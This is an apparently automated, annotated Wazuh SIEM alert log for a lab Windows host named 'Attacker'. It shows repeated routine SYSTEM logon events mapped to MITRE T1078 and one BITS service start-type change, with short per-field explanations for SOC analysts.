rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.178051
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:25.8978248Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43496
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.991+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.991+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.185389
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:29.1249111Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43498
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:34.173+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:34.173+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533894.192727
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:30.5148874Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43500
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:35.128+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:35.128+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533895.200065
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:35.8478096Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2935
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:35.964+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:35.964+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533895.201877
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

